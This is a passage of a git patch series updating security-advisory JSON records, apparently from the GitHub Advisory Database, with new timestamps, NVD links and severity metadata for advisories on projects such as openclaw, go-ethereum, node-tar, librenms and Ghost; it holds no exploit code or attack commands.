b/advisories/github-reviewed/2026/02/GHSA-5r23-prx4-mqg3/GHSA-5r23-prx4-mqg3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5r23-prx4-mqg3", - "modified": "2026-02-19T19:39:01Z", + "modified": "2026-02-20T16:46:49Z", "published": "2026-02-19T19:39:01Z", "aliases": [ "CVE-2026-26963" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/cilium/cilium/security/advisories/GHSA-5r23-prx4-mqg3" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26963" + }, { "type": "WEB", "url": "https://github.com/cilium/cilium/pull/42892" @@ -67,6 +71,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T19:39:01Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:16Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json b/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json index 51279fa50f1f1..3eaf17ceb5529 100644 --- a/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json +++ b/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8mh7-phf8-xgfm", - "modified": "2026-02-17T21:43:41Z", + "modified": "2026-02-20T16:45:23Z", "published": "2026-02-17T21:43:41Z", "aliases": [ "CVE-2026-26326" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8mh7-phf8-xgfm" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26326" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/d3428053d95eefbe10ecf04f92218ffcba55ae5a" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:43:41Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json b/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json index 13049c6558246..6bff99ad0f0ad 100644 --- a/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json +++ b/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cv7m-c9jx-vg7q", - "modified": "2026-02-18T00:46:49Z", + "modified": "2026-02-20T16:45:47Z", "published": "2026-02-18T00:46:49Z", "aliases": [ "CVE-2026-26329" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cv7m-c9jx-vg7q" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26329" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/3aa94afcfd12104c683c9cad81faf434d0dadf87" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:46:49Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:15Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-fw7p-63qq-7hpr/GHSA-fw7p-63qq-7hpr.json b/advisories/github-reviewed/2026/02/GHSA-fw7p-63qq-7hpr/GHSA-fw7p-63qq-7hpr.json index 20ef894fb6f47..9b55e69db24ff 100644 --- a/advisories/github-reviewed/2026/02/GHSA-fw7p-63qq-7hpr/GHSA-fw7p-63qq-7hpr.json +++ b/advisories/github-reviewed/2026/02/GHSA-fw7p-63qq-7hpr/GHSA-fw7p-63qq-7hpr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fw7p-63qq-7hpr", - "modified": "2026-02-18T22:37:15Z", + "modified": "2026-02-20T16:46:42Z", "published": "2026-02-18T22:37:15Z", "aliases": [ "CVE-2026-26958" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/FiloSottile/edwards25519/security/advisories/GHSA-fw7p-63qq-7hpr" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26958" + }, { "type": "WEB", "url": "https://github.com/FiloSottile/edwards25519/commit/d1c650afb95fad0742b98d95f2eb2cf031393abb" @@ -60,6 +64,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:37:15Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:26Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json b/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json index baed442e321ac..c416679c5952b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json +++ b/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g34w-4xqq-h79m", - "modified": "2026-02-18T00:43:54Z", + "modified": "2026-02-20T16:45:39Z", "published": "2026-02-18T00:43:54Z", "aliases": [ "CVE-2026-26328" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g34w-4xqq-h79m" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26328" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/872079d42fe105ece2900a1dd6ab321b92da2d59" @@ -80,6 +84,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:43:54Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:15Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m6j8-rg6r-7mv8/GHSA-m6j8-rg6r-7mv8.json b/advisories/github-reviewed/2026/02/GHSA-m6j8-rg6r-7mv8/GHSA-m6j8-rg6r-7mv8.json index 3a060cb15622b..dd65b4804cdf6 100644 --- a/advisories/github-reviewed/2026/02/GHSA-m6j8-rg6r-7mv8/GHSA-m6j8-rg6r-7mv8.json +++ b/advisories/github-reviewed/2026/02/GHSA-m6j8-rg6r-7mv8/GHSA-m6j8-rg6r-7mv8.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-m6j8-rg6r-7mv8", - "modified": "2026-02-18T22:36:06Z", + "modified": "2026-02-20T16:46:34Z", "published": "2026-02-18T22:36:06Z", "aliases": [ "CVE-2026-26315" ], "summary": "Go Ethereum Improperly Validates the ECIES Public Key in RLPx Handshake", "details": "### Impact\n\nThrough a flaw in the ECIES cryptography implementation, an attacker may be able to extract bits of the p2p node key.\n\n### Patches\n\nThe issue is resolved in the v1.16.9 and v1.17.0 releases of Geth. We recommend rotating the node key after applying the upgrade, which can be done by removing the file `/geth/nodekey` before starting Geth.\n\n### Credit\n\nThe issue was reported as a public pull request to go-ethereum by @fengjian.", - "severity": [], + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], "affected": [ { "package": { @@ -38,6 +43,10 @@ "type": "WEB", "url": "https://github.com/ethereum/go-ethereum/security/advisories/GHSA-m6j8-rg6r-7mv8" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26315" + }, { "type": "WEB", "url": "https://github.com/ethereum/go-ethereum/pull/33669" @@ -62,6 +71,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:36:06Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:46Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json b/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json index c9d8eb065fc3b..02165d997610b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json +++ b/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m7x8-2w3w-pr42", - "modified": "2026-02-18T00:46:55Z", + "modified": "2026-02-20T16:45:55Z", "published": "2026-02-18T00:46:54Z", "aliases": [ "CVE-2026-26323" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m7x8-2w3w-pr42" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26323" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/a429380e337152746031d290432a4b93aa553d55" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:46:54Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json b/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json index 2cd220d567f1d..b569bd2a56b4b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json +++ b/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pv58-549p-qh99", - "modified": "2026-02-19T22:56:54Z", + "modified": "2026-02-20T16:45:30Z", "published": "2026-02-18T00:33:35Z", "aliases": [ "CVE-2026-26327" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pv58-549p-qh99" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26327" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/d583782ee322a6faa1fe87ae52455e0d349de586" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:33:35Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:26Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json b/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json index 796e7ea500aaa..43e61a3cc9b0d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json +++ b/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wgm6-9rvv-3438", - "modified": "2026-02-18T00:56:30Z", + "modified": "2026-02-20T16:46:10Z", "published": "2026-02-18T00:56:30Z", "aliases": [ "CVE-2026-26957" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wgm6-9rvv-3438" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26957" + }, { "type": "WEB", "url": "https://github.com/abhinavxd/libredesk/commit/727213631ce6a36bcb06f50ce542155e78f51316" @@ -57,6 +61,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:56:30Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:15Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json b/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json index cbafa16a3039d..e53b4e6c27245 100644 --- a/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json +++ b/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xwjm-j929-xq7c", - "modified": "2026-02-18T17:37:53Z", + "modified": "2026-02-20T16:46:20Z", "published": "2026-02-18T17:37:52Z", "aliases": [ "CVE-2026-26972" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xwjm-j929-xq7c" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26972" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/7f0489e4731c8d965d78d6eac4a60312e46a9426" @@ -63,6 +67,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T17:37:52Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:16Z" } } \ No newline at end of file From 4f3178c823a59893cf56bed5c4043b516245a683 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:49:25 +0000 Subject: [PATCH 09/77] Publish Advisories GHSA-37gc-85xm-2ww6 GHSA-6hf3-mhgc-cm65 GHSA-83g3-92jg-28cx GHSA-chf7-jq6g-qrwv GHSA-fqx6-693c-f55g GHSA-gqx7-99jw-6fpr GHSA-h7f7-89mm-pqh6 GHSA-w235-x559-36mg GHSA-w52v-v783-gw97 GHSA-w7h5-55jg-cq2f GHSA-xxvh-5hwj-42pp --- .../02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json | 8 ++++++-- .../02/GHSA-6hf3-mhgc-cm65/GHSA-6hf3-mhgc-cm65.json | 8 ++++++-- .../02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json | 8 ++++++-- .../02/GHSA-chf7-jq6g-qrwv/GHSA-chf7-jq6g-qrwv.json | 8 ++++++-- .../02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json | 8 ++++++-- .../02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json | 8 ++++++-- .../02/GHSA-h7f7-89mm-pqh6/GHSA-h7f7-89mm-pqh6.json | 8 ++++++-- .../02/GHSA-w235-x559-36mg/GHSA-w235-x559-36mg.json | 8 ++++++-- .../02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json | 8 ++++++-- .../02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json | 12 ++++++++++-- .../02/GHSA-xxvh-5hwj-42pp/GHSA-xxvh-5hwj-42pp.json | 8 ++++++-- 11 files changed, 70 insertions(+), 22 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json index 474de7cd75b43..15ac4ab2878ea 100644 --- a/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json +++ b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-37gc-85xm-2ww6", - "modified": "2026-02-18T22:44:33Z", + "modified": "2026-02-20T16:47:40Z", "published": "2026-02-18T22:44:33Z", "aliases": [ "CVE-2026-27009" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-37gc-85xm-2ww6" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27009" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/3b4096e02e7e335f99f5986ec1bd566e90b14a7e" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:44:33Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:17Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-6hf3-mhgc-cm65/GHSA-6hf3-mhgc-cm65.json b/advisories/github-reviewed/2026/02/GHSA-6hf3-mhgc-cm65/GHSA-6hf3-mhgc-cm65.json index 2bef5d5f5b39e..5bd15baa3a98e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-6hf3-mhgc-cm65/GHSA-6hf3-mhgc-cm65.json +++ b/advisories/github-reviewed/2026/02/GHSA-6hf3-mhgc-cm65/GHSA-6hf3-mhgc-cm65.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6hf3-mhgc-cm65", - "modified": "2026-02-18T22:43:53Z", + "modified": "2026-02-20T16:47:17Z", "published": "2026-02-18T22:43:53Z", "aliases": [ "CVE-2026-27004" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6hf3-mhgc-cm65" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27004" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/c6c53437f7da033b94a01d492e904974e7bda74c" @@ -57,6 +61,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:43:53Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:17Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json b/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json index 9ca7ca5d742ad..ea16d5b1f6fbf 100644 --- a/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json +++ b/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-83g3-92jg-28cx", - "modified": "2026-02-18T00:57:13Z", + "modified": "2026-02-20T16:47:48Z", "published": "2026-02-18T00:57:13Z", "aliases": [ "CVE-2026-26960" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960" + }, { "type": "WEB", "url": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:57:13Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T02:16:53Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-chf7-jq6g-qrwv/GHSA-chf7-jq6g-qrwv.json b/advisories/github-reviewed/2026/02/GHSA-chf7-jq6g-qrwv/GHSA-chf7-jq6g-qrwv.json index a2da831f289ad..3fa4c04591b06 100644 --- a/advisories/github-reviewed/2026/02/GHSA-chf7-jq6g-qrwv/GHSA-chf7-jq6g-qrwv.json +++ b/advisories/github-reviewed/2026/02/GHSA-chf7-jq6g-qrwv/GHSA-chf7-jq6g-qrwv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-chf7-jq6g-qrwv", - "modified": "2026-02-18T22:43:22Z", + "modified": "2026-02-20T16:47:10Z", "published": "2026-02-18T22:43:21Z", "aliases": [ "CVE-2026-27003" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-chf7-jq6g-qrwv" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27003" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/cf69907015b659e5025efb735ee31bd05c4ee3d5" @@ -56,6 +60,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:43:21Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:16Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json b/advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json index d0d101df4d0a4..ce495c50e84bf 100644 --- a/advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json +++ b/advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fqx6-693c-f55g", - "modified": "2026-02-18T22:08:15Z", + "modified": "2026-02-20T16:48:24Z", "published": "2026-02-18T22:08:15Z", "aliases": [ "CVE-2026-27016" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-fqx6-693c-f55g" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27016" + }, { "type": "WEB", "url": "https://github.com/librenms/librenms/pull/19040" @@ -65,6 +69,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:08:15Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T02:16:55Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json b/advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json index ab257864ba86b..de77227091003 100644 --- a/advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json +++ b/advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gqx7-99jw-6fpr", - "modified": "2026-02-18T22:07:06Z", + "modified": "2026-02-20T16:48:17Z", "published": "2026-02-18T22:07:06Z", "aliases": [ "CVE-2026-26987" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-gqx7-99jw-6fpr" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26987" + }, { "type": "WEB", "url": "https://github.com/librenms/librenms/pull/19038" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:07:06Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T02:16:54Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-h7f7-89mm-pqh6/GHSA-h7f7-89mm-pqh6.json b/advisories/github-reviewed/2026/02/GHSA-h7f7-89mm-pqh6/GHSA-h7f7-89mm-pqh6.json index 2578f4468e1d9..df45017b2417f 100644 --- a/advisories/github-reviewed/2026/02/GHSA-h7f7-89mm-pqh6/GHSA-h7f7-89mm-pqh6.json +++ b/advisories/github-reviewed/2026/02/GHSA-h7f7-89mm-pqh6/GHSA-h7f7-89mm-pqh6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h7f7-89mm-pqh6", - "modified": "2026-02-18T22:44:18Z", + "modified": "2026-02-20T16:47:32Z", "published": "2026-02-18T22:44:18Z", "aliases": [ "CVE-2026-27008" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h7f7-89mm-pqh6" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27008" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/2363e1b0853a028e47f90dcc1066e3e9809d65f1" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:44:18Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:17Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w235-x559-36mg/GHSA-w235-x559-36mg.json b/advisories/github-reviewed/2026/02/GHSA-w235-x559-36mg/GHSA-w235-x559-36mg.json index 9ac94bba72fb7..de4e69ba62a1a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-w235-x559-36mg/GHSA-w235-x559-36mg.json +++ b/advisories/github-reviewed/2026/02/GHSA-w235-x559-36mg/GHSA-w235-x559-36mg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w235-x559-36mg", - "modified": "2026-02-18T22:42:42Z", + "modified": "2026-02-20T16:47:03Z", "published": "2026-02-18T22:42:42Z", "aliases": [ "CVE-2026-27002" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w235-x559-36mg" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27002" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/887b209db47f1f9322fead241a1c0b043fd38339" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:42:42Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:16Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json b/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json index 74a6a2ffb3f09..4a2dcdd19126d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json +++ b/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w52v-v783-gw97", - "modified": "2026-02-18T21:50:23Z", + "modified": "2026-02-20T16:48:09Z", "published": "2026-02-18T21:50:23Z", "aliases": [ "CVE-2026-26980" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26980" + }, { "type": "WEB", "url": "https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91" @@ -60,6 +64,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2026-02-18T21:50:23Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T02:16:54Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json b/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json index 6d14735313222..e863c1ede50b2 100644 --- a/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json +++ b/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w7h5-55jg-cq2f", - "modified": "2026-02-18T21:45:06Z", + "modified": "2026-02-20T16:48:00Z", "published": "2026-02-18T21:45:06Z", "aliases": [ "CVE-2026-26974" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/Tygo-van-den-Hurk/Slyde/security/advisories/GHSA-w7h5-55jg-cq2f" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26974" + }, { "type": "WEB", "url": "https://github.com/Tygo-van-den-Hurk/Slyde/commit/e4c215b061e44fd2ead805de34d72642a710af60" @@ -47,6 +51,10 @@ { "type": "PACKAGE", "url": "https://github.com/Tygo-van-den-Hurk/Slyde" + }, + { + "type": "WEB", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde/releases/tag/v0.0.5" } ], "database_specific": { @@ -56,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T21:45:06Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T01:16:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-xxvh-5hwj-42pp/GHSA-xxvh-5hwj-42pp.json b/advisories/github-reviewed/2026/02/GHSA-xxvh-5hwj-42pp/GHSA-xxvh-5hwj-42pp.json index 452a86ebdb4cc..f99abfac22b0e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-xxvh-5hwj-42pp/GHSA-xxvh-5hwj-42pp.json +++ b/advisories/github-reviewed/2026/02/GHSA-xxvh-5hwj-42pp/GHSA-xxvh-5hwj-42pp.json @@ -1,7 